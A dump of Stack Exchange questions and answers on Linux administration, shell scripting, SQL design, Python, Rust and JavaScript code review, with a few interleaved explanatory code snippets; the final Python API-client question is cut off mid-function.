_unix.175971 | I'm testing GNOME 3.14 on Wayland on ArchLinux and I would also like to test GTK+ on Wayland. To do so, I can set the following two env variables from the terminal: export GDK_BACKEND=wayland CLUTTER_BACKEND=wayland and then run my app (i.e. nautilus) from the terminal too. However I would like to set this session-wide so that I don't have to launch my apps from the terminal. I think I cannot set them in .bashrc because they will break my standard GNOME on X session. So where is the proper place to set those variables for the GNOME on Wayland session ONLY? | Setting environment variables for Gnome on Wayland session only | bash;gnome;gtk;wayland | I have found a way to do this. Create (if necessary) a ~/.profile file and add the following: WAY=$(ps -aux | head -n -1 | grep "/usr/bin/gnome-shell --wayland"); if [ -z "$WAY" ]; then echo "X11"; else export GDK_BACKEND=wayland; export CLUTTER_BACKEND=wayland; fi. Log out and then log in to your favorite session (either X or Wayland). By using looking glass you can check if your application is actually running on Wayland. See this. |
_unix.346913 | I'm writing some iptables scripts, and I want to write a function that takes an arbitrary number of parameters and consumes them two at a time. Here's an example:#!/bin/sh# Allow inbound sessions for a specific serviceiptables --append INPUT --protocol $PROTO --destination-port $PORT \ --match state --state NEW --jump ACCEPT || exit 1I found this thread that shows the right syntax for looping through an arbitrary number of arguments, but I don't know how to grab two arguments in each iteration. How do I get both $PROTO and $PORT from the caller (from $@, two args at a time)? | Shell function that consumes two arguments per loop iteration | shell;arguments | You could do:#! /bin/sh -while [ $# -ge 2 ]; do proto=$1 port=$2 shift 2 iptables --append INPUT --protocol $proto --destination-port $port \ --match state --state NEW --jump ACCEPT || exit 1doneWith zsh:#! /bin/zsh -for proto port do iptables --append INPUT --protocol $proto --destination-port $port \ --match state --state NEW --jump ACCEPT || exit 1doneOne difference is that if there's an odd number of argument, there will be an extra run with $proto containing the last argument and $port being set but empty (as if we had used [ $# -gt 0 ] instead of [ $# -ge 2 ] in the previous example). |
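For comparison, the same two-at-a-time consumption in another language: in Python, zipping one iterator with itself pulls two items per pair, which is the idiom closest to zsh's `for proto port` loop.

```python
def arg_pairs(args):
    """Group a flat argument list into (proto, port) pairs, two at a time."""
    it = iter(args)
    # zip draws from the same iterator twice per step, so items never overlap;
    # a trailing unpaired argument is silently dropped, like [ $# -ge 2 ].
    return list(zip(it, it))

print(arg_pairs(["tcp", "80", "udp", "53"]))  # [('tcp', '80'), ('udp', '53')]
print(arg_pairs(["tcp", "80", "udp"]))        # [('tcp', '80')] -- odd arg dropped
```

On Python 3.10 and later, `zip(it, it, strict=True)` turns an odd argument count into an error instead of dropping it, mirroring a shell version that exits when `$#` is odd.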
_softwareengineering.191045 | Over the course of some months I've created a little framework for game development that I currently include in all of my projects. The framework depends on SFML, LUA, JSONcpp, and other libraries. It deals with audio, graphics, networking, threading; it has some useful file system utilities and LUA wrapping capabilities. Also, it has many useful random utility methods, such as string parsing helpers and math utils. Most of my projects use all of these features, but not all of them: I have an automatic updater that only makes use of the file system and networking features. I have a game with no networking capabilities. I have a project that doesn't need JSONcpp. I have a project that only needs those string/math utils. This means that I have to include the SFML/LUA/JSON shared libraries in every project, even if they aren't used. The projects (uncompressed) have a minimum of 10MB in size this way, most of which is unused. The alternative would be splitting the framework into many smaller libraries, which I think would be much more effective and elegant, but would also have the cost of having to maintain more DLL files and projects. I would have to split my framework into a lot of smaller libraries: graphics, threading, networking, file system, smaller utils, JSONcpp utils, LUA utils. Is this the best solution? | Few big libraries or many small libraries? | libraries;game development;workflows;dependencies;utilities | I'd personally go for many small libraries. It discourages developers from creating dependencies between otherwise unrelated packages. You get smaller, more manageable libraries that are much more focused. It is easier to break up and have separate teams manage each library. And once you have a new requirement that's sufficiently complex, it's better to add a new module rather than find an existing library to shove the new code in. Small libraries encourage this pattern. |
_softwareengineering.184705 | I'll preface this question by saying that I am very new to professional software dev.

I work on a team that takes data in from other groups in my company and turns this data into reports usable by business execs. In the process of transferring and parsing data we have some SQL statements that do a lot of processing of the data. Nearly every SELECT uses TRIM, SUBSTR, CAST etc extensively to reduce fields to the proper size and format. Additionally there are a lot of special cases that are accounted for by using CASE statements within SELECT's. The Teradata server software that we use emits remarkably cryptic error messages. As a result we do a lot of guesswork about what data is breaking which SQL statement.

My question is: would it be a good idea to reduce these somewhat complex SQL statements to a less complex form that omits the processing and special case handling, and instead do this work in an external script or program? Does this make any sense? | Good idea to move logic out of SQL statements? | sql;complexity | A big advantage of moving the processing code out of your SQL is that your SQL becomes much simpler to manage.

A disadvantage is that if you ever want to use those queries in some other program, you now have to make your result-processing processes available to the other program. It could be as simple as copying a library file that contains the necessary classes, but it still means that any changes to the library have to be propagated and all clients rebuilt with the new library.

Another option: Why not use a view (or multiple views if you need differently formatted results for different clients) to contain most of the formatting code? That way you can get the raw query results, or the nicely formatted one, depending on what you need.
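The view suggestion in the answer can be demonstrated with a small, self-contained sketch using Python's built-in sqlite3 (Teradata syntax differs; the table, columns, and CASE rule here are invented purely for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE raw_data (code TEXT, amount REAL)")
conn.executemany("INSERT INTO raw_data VALUES (?, ?)",
                 [(" a1 ", 10.5), ("b2", 3.0)])

# The view owns the TRIM/CAST/CASE formatting, so callers can query either
# raw_data (unprocessed) or clean_data (formatted) as needed.
conn.execute("""
    CREATE VIEW clean_data AS
    SELECT TRIM(code)              AS code,
           CAST(amount AS INTEGER) AS amount,
           CASE WHEN amount > 5 THEN 'big' ELSE 'small' END AS bucket
    FROM raw_data
""")
rows = conn.execute("SELECT * FROM clean_data ORDER BY code").fetchall()
```

This keeps the base query simple while the formatting logic stays in the database, available to every client without distributing a processing library.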
_unix.50180 | I have installed vnuml and bridge-utils on my machine, but am unable to run the brctl command on the xterm terminals that popup after building the simulation. I get a 'command not found' error. I am, however, able to run the brctl command on my host machine's terminal, so the package is there, only the virtual nodes created are not able to access it.What needs to be done to make the 'brctl' command available to each of the UML terminals? | VNUML - 'brctl' command doesn't work in xterms | xterm | null |
_unix.358768 | I am sshing to a system and rebooting it in a while loop, however the ssh session does not close so the script is just hanging after the first reboot. I have tried various ways to close it, any idea? I never get to the echo test.

#!/bin/bash
while true
do
echo Executing SSH session to 192.168.1.1...
sshpass -p pass ssh -o StrictHostKeyChecking=no [email protected] << !
    ./reset.sh
!
echo test
sleep 20
done

reset.sh

#! /bin/sh
if [ -e /dev/ttyUSB2 ] && [ -e /dev/ttyUSB5 ]; then
{
reboot -f
}
fi

| ssh session not closing in bash script | bash;ssh | What can be happening is the remote session being lost as you are asking for a reboot, and so the system will hang some time waiting for the remote system to answer.

I would introduce before that sshpass a timeout command, like timeout or timelimit, as in:

timeout 10s sshpass ...

As for ssh services, try to avoid using passwords, and instead use RSA certificate authentication. Not sure about that particular sshpass command, but often, if the binary being called does not take precautions, the password can be seen with ps when used in the command line.
_unix.146848 | The information below seems misleading. I am confused with the example they give that if you lose dpkg (the program that lets you handle .deb files) you can use the other commands ar, tar, and gzip commands to download the .deb file for dpkg itself?If this is true, what is so special about dpkg that is not available with the other commands?As a Debian system administrator, you will routinely handle .deb packages, since they contain consistent functional units (applications, documentation, etc.), whose installation and maintenance they facilitate. It is therefore a good idea to know what they are and how to use them. This chapter describes the structure and contents of binary and source packages. The former are .deb files, directly usable by dpkg, while the latter contain the source code, as well as instructions for building binary packages. From: http://debian-handbook.info/browse/wheezy/packaging-system.html5.1. Structure of a Binary Package The Debian package format is designed so that its content may be extracted on any Unix system that has the classic commands ar, tar, and gzip (sometimes xz or bzip2). This seemingly trivial property is important for portability and disaster recovery. Imagine, for example, that you mistakenly deleted the dpkg program, and that you could thus no longer install Debian packages. dpkg being a Debian package itself, it would seem your system would be done for... Fortunately, you know the format of a package and can therefore download the .deb file of the dpkg package and install it manually (see the TOOLS sidebar). If by some misfortune one or more of the programs ar, tar or gzip/xz/bzip2 have disappeared, you will only need to copy the missing program from another system (since each of these operates in a completely autonomous manner, without dependencies, a simple copy will suffice). | How it is possible that dpkg isn't neccesary for installing deb packages? | debian;dpkg;packaging;ar | null |
_codereview.14442 | For Project Euler problem 14 I wrote code that runs for longer than a minute to give the answer. After I studied about memoization, I wrote this code which runs for nearly 10 seconds on Cpython and nearly 3 seconds on PyPy. Can anyone suggest some optimization tips?

import time

d={}
c=0

def main():
    global c
    t=time.time()
    for x in range(2,1000000):
        c=0
        do(x,x)
    k=max(d.values())
    for a,b in d.items():
        if b==k:
            print(a,b)
            break
    print(time.time()-t)

def do(num,rnum):
    global d
    global c
    c+=1
    try:
        c+=d[num]-1
        d[rnum]=c
        return
    except:
        if num==1:
            d[rnum]=c
            return
        if num%2==0:
            num=num/2
            do(num,rnum)
        else:
            num=3*num+1
            do(num,rnum)

if __name__ == '__main__':
    main()

| Optimizing Code for Project Euler Problem 14 | python;optimization;project euler | I think you're over complicating your solution, my approach would be something along these lines:

def recursive_collatz(n):
    if n in collatz_map:
        return collatz_map[n]
    if n % 2 == 0:
        x = 1 + recursive_collatz(int(n/2))
    else:
        x = 1 + recursive_collatz(int(3*n+1))
    collatz_map[n] = x
    return x

Basically define a memoization map (collatz_map), initialized to {1:1}, and use it to save each calculated value, if it's been seen before, simply return.

Then you just have to iterate from 1 to 1000000 and store two values, the largest Collatz value you've seen so far, and the number that gave you that value.

Something like:

largest_so_far = 1
highest = 0
for i in range(1,1000000):
    temp = recursive_collatz(i)
    if temp > largest_so_far:
        highest = i
        largest_so_far = temp

Using this approach I got:

Problem 14's answer is: 837799.
Took 1.70620799065 seconds to calculate.
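As a further variation on the answer's memoisation (not from the original thread): Python's functools.lru_cache can replace the hand-rolled dictionary. The 10,000 limit below is only to keep the sketch fast.

```python
from functools import lru_cache
import sys

sys.setrecursionlimit(10_000)  # Collatz chains can recurse a few hundred deep

@lru_cache(maxsize=None)
def chain_len(n):
    """Collatz chain length of n, memoised by the standard library."""
    if n == 1:
        return 1
    return 1 + chain_len(n // 2 if n % 2 == 0 else 3 * n + 1)

# Starting number below 10,000 with the longest chain
best = max(range(1, 10_000), key=chain_len)
```

This trades explicit control of the cache for much shorter code; lru_cache also exposes hit/miss statistics via chain_len.cache_info().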
_unix.198270 | I want to tunnel VNC traffic to host2, which is only accessible from host1, whereas host1 is publicly accessible. I setup a multi-hop SSH tunnel as described in this question, using:

ssh -L 5901:localhost:6000 host1 ssh -L 6000:localhost:5901 -N host2

This indeed works perfectly and does the job. However, I don't know how to correctly close the nested tunnel. I tried Ctrl+c but this seems to kill the first ssh instance to host1. But the second ssh tunnel between host1 and host2 remains open, which is highly undesirable as anyone can actually forward traffic through it.

Also, with the -N option, I don't get an actual tty on host2, so I can't simply exit from there. Without -N, I still don't get a tty, instead I get the following error:

Pseudo-terminal will not be allocated because stdin is not a terminal.
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
term: Undefined variable.

I am starting the connection from MacOS X, and both host1 and host2 are running RHEL 6. | Correctly closing multiple hop SSH tunnel | ssh;rhel;ssh tunneling | You're on the right track with tty, and the -t option gives you just that. However, unless you are actually aiming to get a tty session for interacting, leave this option off of the last ssh command in your chain. In your case you just need it on the first connection:

ssh -L 5901:localhost:6000 host1 -t ssh -L 6000:localhost:5901 -N host2

Now when you use Ctrl-C, the tunnel will close between all hosts.
_codereview.146671 | I have a small project to help me analyze query latency from PostgreSQL statement logging.It's my first time writing anything real in Rust and I think it could be improved in several ways. My question here is about this code from scanner.rs:use std::hash::{Hash, SipHasher, Hasher};use regex::Regex;use std::collections::HashMap;use std::string::String;use std;use csv::Writer;pub enum CrunchState { Scanning(HashMap<i32,String>, Writer<std::io::Stdout>), CurrentQuery(Vec<String>, i32, HashMap<i32,String>, Writer<std::io::Stdout>)}enum MatchResult { Ignore, QueryStart(i32, String), Duration(i32, String)}lazy_static! { static ref REGLS: Regex = Regex::new(r^2016).unwrap(); static ref REPID: Regex = Regex::new(r\d{2,3}\((\d+)\):).unwrap(); static ref REDURATION: Regex = Regex::new(rduration: ([0-9.]+) ms).unwrap(); static ref RESTATEMENT: Regex = Regex::new(r(?:execute.*|statement):(.*)).unwrap();}pub fn init_state() -> CrunchState { let csv_writer: Writer<std::io::Stdout> = Writer::from_writer(std::io::stdout()); CrunchState::Scanning(HashMap::new(), csv_writer)}pub fn process_line(line:String, state:CrunchState) -> CrunchState { match state { CrunchState::Scanning(mut pid_to_query, mut csv_writer) => { match analyze_line(line) { MatchResult::Ignore => CrunchState::Scanning(pid_to_query, csv_writer), MatchResult::QueryStart(pid, query_begin) => { let query_parts = vec![query_begin]; CrunchState::CurrentQuery(query_parts, pid, pid_to_query, csv_writer) }, MatchResult::Duration(pid, duration) => { match pid_to_query.remove(&pid) { Some(full_query) => { let mut hasher = SipHasher::new(); full_query.hash(&mut hasher); let qhash = hasher.finish(); let result = csv_writer.encode((pid, duration, qhash, &full_query)); assert!(result.is_ok()); }, None => { // dangling duration } }; CrunchState::Scanning(pid_to_query, csv_writer) } } }, CrunchState::CurrentQuery(mut query_parts, pid, mut pid_to_query, csv_writer) => { if !REGLS.is_match(&line) { 
query_parts.push(line); CrunchState::CurrentQuery(query_parts, pid, pid_to_query, csv_writer) } else { let full_query = query_parts.iter().fold(.to_string(), |acc, s| acc + s); pid_to_query.insert(pid, full_query); process_line(line, CrunchState::Scanning(pid_to_query, csv_writer)) } } }}fn analyze_line(line:String) -> MatchResult { if REGLS.is_match(&line) { match REPID.captures_iter(&line).nth(0) { Some(cap) => { let pid: &str = cap.at(1).unwrap(); if REDURATION.is_match(&line) { let duration: &str = REDURATION.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); MatchResult::Duration(pid.parse::<i32>().unwrap(), duration.to_string()) } else if RESTATEMENT.is_match(&line) { let statement: &str = RESTATEMENT.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); MatchResult::QueryStart(pid.parse::<i32>().unwrap(), statement.to_string()) } else { MatchResult::Ignore } }, None => { MatchResult::Ignore } } } else { MatchResult::Ignore }}For reference Cargo.toml:[package]name = pg_crunchversion = 0.1.0authors = [Joshua Barney <[email protected]>][dependencies]regex = 0.1.80lazy_static = 0.2.1csv = 0.14.7Since you can put data into enums, I figured that would be a great way of building a little state machine.It runs and works correctly, but I'm worried about returning a new CrunchState enum for every call to process_line, especially when most lines should result in CrunchState::Ignore and not alter the state. What can I do better than this? | Enum as state for log parsing | enum;rust | The compiler warnings tell me that SipHasher has been deprecated; use DefaultHasher instead.Check out rustfmt. 
The code has issues with missing spaces after : and ,.Use lines on stdin instead of reimplementing it.main.rsextern crate pg_crunch;use std::io;use std::io::prelude::*;use pg_crunch::scanner::CrunchState;fn main() { let mut state = CrunchState::new(); let stdin = io::stdin(); for line in stdin.lock().lines() { match line { Ok(line) => state = state.process_line(line), Err(error) => println!(error: {}, error), } }}scanner.rsDon't use String; it's already imported. I'd probably prefer to import specific modules or types instead of referring to std.You can create methods on enums just like on structs. new and process_line really feel like methods to me.Accept a &str instead of a String unless you make use of the allocation. analyze_line is a good example.Create a tiny helper method for getting the hash.Consider glob-importing your enum into methods that deal with them heavily.Use if let when there's only one interesting match arm.Use collect to combine multiple strings from an iterator.Avoid Hungarian notation (where you encode the type of something into the name of the variable). The regexen don't need to be prefixed with RE.Don't provide explicit types unless you are required. : Writer<std::io::Stdout> is a good example.There's no need for the turbofish when the type is constrained by the struct you are putting the value in.Instead of assert!, call expect on the Result. This prints the error message and lets you add a bit more context.Try to avoid doing multiple regex calls for the same input. For example, calling is_match is redundant if you are also going to call captures_iter. 
You should be able to tell if it matched by the result of captures_iter.use std::hash::{Hash, Hasher};use std::collections::hash_map::DefaultHasher;use std::collections::HashMap;use std::io::{self, Stdout};use regex::Regex;use csv::Writer;pub enum CrunchState { Scanning(HashMap<i32, String>, Writer<Stdout>), CurrentQuery(Vec<String>, i32, HashMap<i32, String>, Writer<Stdout>),}fn one_shot_hash(full_query: &str) -> u64 { let mut hasher = DefaultHasher::new(); full_query.hash(&mut hasher); hasher.finish()}impl CrunchState { pub fn new() -> CrunchState { let csv_writer = Writer::from_writer(io::stdout()); CrunchState::Scanning(HashMap::new(), csv_writer) } pub fn process_line(self, line: String) -> CrunchState { use self::CrunchState::*; use self::MatchResult::*; match self { Scanning(mut pid_to_query, mut csv_writer) => { match analyze_line(&line) { Ignore => Scanning(pid_to_query, csv_writer), QueryStart(pid, query_begin) => { let query_parts = vec![query_begin]; CurrentQuery(query_parts, pid, pid_to_query, csv_writer) } Duration(pid, duration) => { if let Some(full_query) = pid_to_query.remove(&pid) { let query_hash = one_shot_hash(&full_query); let result = csv_writer.encode((pid, duration, query_hash, &full_query)); result.expect(Unable to write result); } Scanning(pid_to_query, csv_writer) } } } CurrentQuery(mut query_parts, pid, mut pid_to_query, csv_writer) => { if !GLS.is_match(&line) { query_parts.push(line); CurrentQuery(query_parts, pid, pid_to_query, csv_writer) } else { let full_query = query_parts.into_iter().collect(); pid_to_query.insert(pid, full_query); Scanning(pid_to_query, csv_writer).process_line(line) } } } }}lazy_static! 
{ static ref GLS: Regex = Regex::new(r^2016).unwrap(); static ref PID: Regex = Regex::new(r\d{2,3}\((\d+)\):).unwrap(); static ref DURATION: Regex = Regex::new(rduration: ([0-9.]+) ms).unwrap(); static ref STATEMENT: Regex = Regex::new(r(?:execute.*|statement):(.*)).unwrap();}enum MatchResult { Ignore, QueryStart(i32, String), Duration(i32, String),}fn analyze_line(line: &str) -> MatchResult { use self::MatchResult::*; if GLS.is_match(&line) { match PID.captures_iter(&line).nth(0) { Some(cap) => { let pid = cap.at(1).unwrap(); if DURATION.is_match(&line) { let duration = DURATION.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); Duration(pid.parse().unwrap(), duration.to_string()) } else if STATEMENT.is_match(&line) { let statement = STATEMENT.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); QueryStart(pid.parse().unwrap(), statement.to_string()) } else { Ignore } } None => Ignore, } } else { Ignore }}Am I correct in thinking that creating a new enum for every call to analyze_line is not something to worry about?It is not something that I would worry about, no. The biggest enum is a few bytes, but not many:Veci32HashMapWriterVec and HashMap are mostly on the heap and only have a few bytes for pointers and the like. |
_webapps.87840 | I googled, but can't find a definitive answer.I have a 1k+ reputation as an eBay buyer.Now I want to try to get back some of the cash that I have sent by selling.If I do, will prospective buyers looking at my first sales listing see a reputation of 1k+ or zer0? | eBay - are buyer and seller reputation the same? | ebay | Yes, you have a single reputation score. So, your sales listing will show a 1k+ reputation score.HOWEVER, if someone clicks on your reputation score they can see the full breakdown:Feedback as a seller (under which it will state 0 Feedback received)Feedback as a buyerAll FeedbackFeedback left for othersAs well as the positive, neutral and negative feedback over the last 1, 6 and 12 months. |
_webmaster.68626 | I know this question has been already asked here. I am trying to use a script in my localhost. The script contains .htm files and an .htaccess file with the following code to parse those .htm files as PHP.AddHandler application/x-httpd-php5 .htm .php .htmlNow this is not working at all and i get a blank web page whenever i run it from my localhost. i.e localhost/paystill_enterprise and it give me blank webpage.Now i have tried every solution i could find on internet like editing httpd.conf file etc. Here are some of the solutions i have tried.1- I have tried editing httdp.conf and have added the following code one by one <IfModule mime_module> AddType application/x-httpd-php .php AddType application/x-httpd-php .html AddType application/x-httpd-php .htm AddType application/x-httpd-php .txt </IfModule> <FilesMatch \.html$> ForceType application/x-httpd-php </FilesMatch> <FilesMatch \.htm$> ForceType application/x-httpd-php </FilesMatch>2- Tried adding these lines of code one by one in my .htaccess file AddType application/x-httpd-php .html .htm AddType application/x-httpd-php5 .html .htm RemoveHandler .html .htm AddType application/x-httpd-php .php .htm .htmlNo matter what i use, always get a blank page for localhost/paystill_enterprise.Note:Sometimes it also happens that when i type the address localhost/paystill_enterprise, the browsers asks me to save the file i.e the browser tries to download it.Any suggestions? | Wamp Server Not Parsing htm Files As PHP | apache;apache2;wampserver;wamp | null |
_unix.239351 | I am trying to use lisp in linux but I can not get the listener to work.Using Eclipse's menu, in help -> install new software, I installed the dandelion plugin but every time I try to run lisp code, like (+ 1 2), something simple, I get the following errors:Error in background evaluationjava.net.ConnectException: Connection refusedError initialising connectionjava.net.ConnectException: Connection refusedStarting eval server failedCannot run program /home/michael/.eclipse/org.eclipse.platform_3.8_155965261/plugins/de.defmacro.dandelion.env.clisp.linux.x86_2.49.2/binary/environment_clisp_2.49.2: error=13, Permission deniedI have tried running the commandsudo chmod + /home/michael/.eclipse/org.eclipse.platform_3.8_155965261/plugins/de.defmacro.dandelion.env.clisp.linux.x86_2.49.2/binary/environment_clisp_2.49.2Yet I see no output, the terminal just goes to the next new line. I am running a 64bit ubuntu version 14. I am pretty new to all this but I would like to use linux as my main OS as it is quite convenient for school. If anyone has ideas please let me know!I went in and manually edited the files permission to allow anyone to read and write. I now only get the errors.Error in background evaluationjava.net.ConnectException: Connection refusedError initialising connectionjava.net.ConnectException: Connection refusedIdeas? | Dandelion List Listener Fails | linux;chmod;eclipse | null |
_codereview.15617 | I have the following code:

public string GetRefStat(string pk)
{
    return RefStat[pk.Substring(2, 2)];
}

private readonly Dictionary<String, int> RefStat = new Dictionary<string, int>
{
    {"00", REF.MenuType},        // Menu
    {"01", REF.ReferenceStatus}, // Article
    {"02", REF.ReferenceStatus}, // Favorites List
    {"03", REF.ReferenceStatus}, // Content Block
    {"06", REF.ReferenceStatus}  // Topic
};

GetRefStat and the dictionary are always used together. Is there a way I could simplify and combine these? I was wondering if I could put the information in a static class and then have a get method that returned the information I needed. | Simplifying dictionary of constant values | c# | null
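A rough Python translation of the lookup, with invented constant values standing in for the REF members, just to show the substring-keyed dictionary shape:

```python
# Hypothetical stand-ins for the REF constants in the C# code
REF_MENU_TYPE = 1
REF_REFERENCE_STATUS = 2

# Characters 2-3 of the key select the category, like pk.Substring(2, 2)
REF_STAT = {
    "00": REF_MENU_TYPE,         # Menu
    "01": REF_REFERENCE_STATUS,  # Article
    "02": REF_REFERENCE_STATUS,  # Favorites List
}

def get_ref_stat(pk):
    return REF_STAT[pk[2:4]]
```

The lookup and its table live together, which is essentially the combination the question is asking about.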
_codereview.86168 | I have a code snippet which I wish to improve to increase my program's FPS, but as a beginner in JavaScript, I do not know how. I know the problem, which is the fact my counter mechanism used to delay attacks is causing lag. I just don't know how to change my code to minimize this lag. I am looking for helpful criticism and code examples to improve my code.I am going to provide the entire function my code snippet is in so you can relate to it. (I have been told this will help debuggers elsewhere.)The function to optimize:var updateMobs = function() { // Called in a loop at 30 FPS for (var b = 0; b < mobsBlue.length; b++) { // The length of both lists is at max 60 BM = mobsBlue[b] BM.x = BM.x - BM.object.speed doCollision(BM, redBase, BM) doCollision(BM, debugPlayer, BM) if (BM.x < 0){ mobsBlue.splice(br, 1) } BM.Draw(ctx, false) } for (var r = 0; r < mobsRed.length; r++) { RM = mobsRed[r] RM.x = RM.x + RM.object.speed doCollision(RM, blueBase, RM) doCollision(RM, debugPlayer, RM) if (RM.x > 1350){ mobsRed.splice(r, 1) } RM.Draw(ctx, false) for (var br = 0; br < mobsBlue.length; br++) { BM = mobsBlue[br] if (doCollision(RM, BM, collisionNull) == true) { // ATTACKING BM.x = BM.x + BM.object.speed RM.x = RM.x - RM.object.speed if (BM.object.attackTime == 500 || RM.object.attackTime == 500) { if (BM.object.armourType == 'light') { BM.object.health = BM.object.health - RM.object.lightDamage } if (BM.object.armourType == 'heavy') { BM.object.health = BM.object.health - RM.object.heavyDamage } if (RM.object.armourType == 'light') { RM.object.health = RM.object.health - BM.object.lightDamage } if (RM.object.armourType == 'heavy') { RM.object.health = RM.object.health - BM.object.heavyDamage } if (BM.object.health <= 0) { mobsBlue.splice(br, 1) } if (RM.object.health <= 0) { mobsRed.splice(r, 1) } BM.object.attackTime = 0 RM.object.attackTime = 0 } BM.object.attackTime = BM.object.attackTime + 1 RM.object.attackTime = RM.object.attackTime + 1 } 
BM.Draw(ctx, false) RM.Draw(ctx, false) } }}The doCollision and moveOutside functions:var doCollision = function(rect1, rect2, objectToMove) { if (rect1.x + rect1.w > rect2.x && rect1.x < rect2.x + rect2.w && rect1.y + rect1.h > rect2.y && rect1.y < rect2.y + rect2.h) { if (objectToMove === rect1) { moveOutside(objectToMove, rect2); return true } else if (objectToMove === rect2) { moveOutside(objectToMove, rect1); return true } return true };};var moveOutside = function(rectToMove, otherRect) { // Determine if the overlap is due more to x or to y, // then perform the appropriate move var moveOverOtherX = rectToMove.x + rectToMove.w - otherRect.x; var otherOverMoveX = otherRect.x + otherRect.w - rectToMove.x; var moveOverOtherY = rectToMove.y + rectToMove.h - otherRect.y; var otherOverMoveY = otherRect.y + otherRect.h - rectToMove.y; var minOver = Math.min(moveOverOtherX, otherOverMoveX, moveOverOtherY, otherOverMoveY); if (minOver == moveOverOtherX) { rectToMove.x = otherRect.x - rectToMove.w; } else if (minOver == otherOverMoveX) { rectToMove.x = otherRect.x + otherRect.w; } else if (minOver == moveOverOtherY) { rectToMove.y = otherRect.y - rectToMove.h; } else { rectToMove.y = otherRect.y + otherRect.h; };};I am looking for more answers. | FPS efficiency for 'attack counter' | javascript;beginner;performance;collision;battle simulation | null |
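The doCollision test above is a standard axis-aligned bounding-box (AABB) overlap check; here is a language-neutral sketch in Python using the same x/y/w/h fields as the JavaScript rectangles:

```python
def rects_overlap(r1, r2):
    """True when two axis-aligned rectangles overlap (edge contact is not overlap)."""
    return (r1["x"] + r1["w"] > r2["x"] and r1["x"] < r2["x"] + r2["w"] and
            r1["y"] + r1["h"] > r2["y"] and r1["y"] < r2["y"] + r2["h"])
```

A cheap pre-check like this, run before the heavier moveOutside resolution, is exactly what keeps per-frame collision cost down.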
_unix.361241 | I have a Dell U2417HA monitor that came with my Dell Desktop. The monitor has an audio output and from what I've read the audio is supposed to come through the HDMI cable and I should be able to plug my earphones directly in the monitor's output. The problem is that this doesn't happen, probably because I installed Linux Mint 18 on the desktop.Unfortunately, the Dell website only lists windows drivers for this monitor, and I haven't been able to find this topic on the internet. Any ideas?PS.: I have already switched to HDMI output on the sound configurations menu, and tried every possible option in pavucontrol.I have the default 4.4 kernel installed. I don't know if upgrading the kernel to 4.10 might solve the problem, but I'd like to avoid doing this unless there really isn't another solution.EDITI just found out that I'm actually using a DP connection for the monitors, since I don't have an HDMI port in my CPU (I didn't install this computer). But according this answer DP also carries audio. 
So can I still get sound through my monitor?EDIT2Output of xrandr:Screen 0: minimum 8 x 8, current 3840 x 1080, maximum 16384 x 16384DP-0 disconnected (normal left inverted right x axis y axis)DP-1 disconnected (normal left inverted right x axis y axis)DP-2 connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 527mm x 296mm 1920x1080 60.00*+ 60.00 59.94 50.00 23.97 60.05 60.00 50.04 1600x1200 60.00 1280x1024 75.02 60.02 1280x720 60.00 59.94 50.00 1152x864 75.00 1024x768 75.03 60.00 800x600 75.00 60.32 720x576 50.00 720x480 59.94 640x480 75.00 59.94 59.93 DP-3 connected 1920x1080+1920+0 (normal left inverted right x axis y axis) 527mm x 296mm 1920x1080 60.00*+ 60.00 59.94 50.00 23.97 60.05 60.00 50.04 1600x1200 60.00 1280x1024 75.02 60.02 1280x720 60.00 59.94 50.00 1152x864 75.00 1024x768 75.03 60.00 800x600 75.00 60.32 720x576 50.00 720x480 59.94 640x480 75.00 59.94 59.93 Output from aplay -l**** List of PLAYBACK Hardware Devices ****card 0: PCH [HDA Intel PCH], device 0: ALC3220 Analog [ALC3220 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0card 1: NVidia [HDA NVidia], device 3: HDMI 0 [HDMI 0] Subdevices: 1/1 Subdevice #0: subdevice #0card 1: NVidia [HDA NVidia], device 7: HDMI 1 [HDMI 1] Subdevices: 1/1 Subdevice #0: subdevice #0EDIT3Contents from /proc/asound/card0/codec#0 and from /proc/asound/card1/codec#0. The latter one is probably the one that matters (NVIDIA). | Sound output from Dell U2417HA monitor doesn't work on Linux | linux mint;drivers;audio | null |
_codereview.173049 | I'd like some feedback on the readability, style, and potential problems or issues. In particular I'm not too happy with how I handle ratelimits.import jsonimport requestsimport pandas as pdimport matplotlib.pyplot as pltfrom dateutil.relativedelta import relativedeltafrom datetime import datefrom flatten_json import flattenfrom tqdm import tnrange as trangefrom time import sleepclass CrimsonHexagonClient(object): Interacts with the Crimson Hexagon API to retrieve post data (twitter ids etc.) from a configured monitor. Docs: https://apidocs.crimsonhexagon.com/v1.0/reference Args: username (str): Username on website. password (str): Password on website. monitor_id (str): id of crimson monitor. def __init__(self, username, password, monitor_id): self.username = username self.password = password self.monitor_id = monitor_id self.base = 'https://api.crimsonhexagon.com/api/monitor' self.session = requests.Session() self.ratelimit_refresh = 60 self._auth() def _auth(self): Authenticates a user using their username and password through the authenticate endpoint. url = 'https://forsight.crimsonhexagon.com/api/authenticate?' payload = { 'username': self.username, 'password': self.password } r = self.session.get(url, params=payload) j_result = r.json() self.auth_token = j_result[auth] print('-- Authenticated --') return def make_endpoint(self, endpoint): return '{}/{}?'.format(self.base, endpoint) def get_data_from_endpoint(self, from_, to_, endpoint): Hits the designated endpoint (volume/posts) for a specified time period. The ratelimit is burned through ASAP and then backed off for one minute. 
        endpoint = self.make_endpoint(endpoint)
        from_, to_ = str(from_), str(to_)
        payload = {
            'auth': self.auth_token,
            'id': self.monitor_id,
            'start': from_,
            'end': to_,
            'extendLimit': 'true',
            'fullContents': 'true'
        }
        r = self.session.get(endpoint, params=payload)
        self.last_response = r
        ratelimit_remaining = r.headers['X-RateLimit-Remaining']

        # If the header is empty or 0 then wait for a ratelimit refresh.
        if (not ratelimit_remaining) or (float(ratelimit_remaining) < 1):
            print('Waiting for ratelimit refresh...')
            sleep(self.ratelimit_refresh)

        return r

    def get_dates_from_timespan(self, r_volume, max_documents=10000):
        """Divides the time period into chunks of less than 10k where possible."""
        # If the count is less than max, just return the original time span.
        if r_volume.json()['numberOfDocuments'] <= max_documents:
            l_dates = [[pd.to_datetime(r_volume.json()['startDate']).date(),
                        pd.to_datetime(r_volume.json()['endDate']).date()]]
            return l_dates

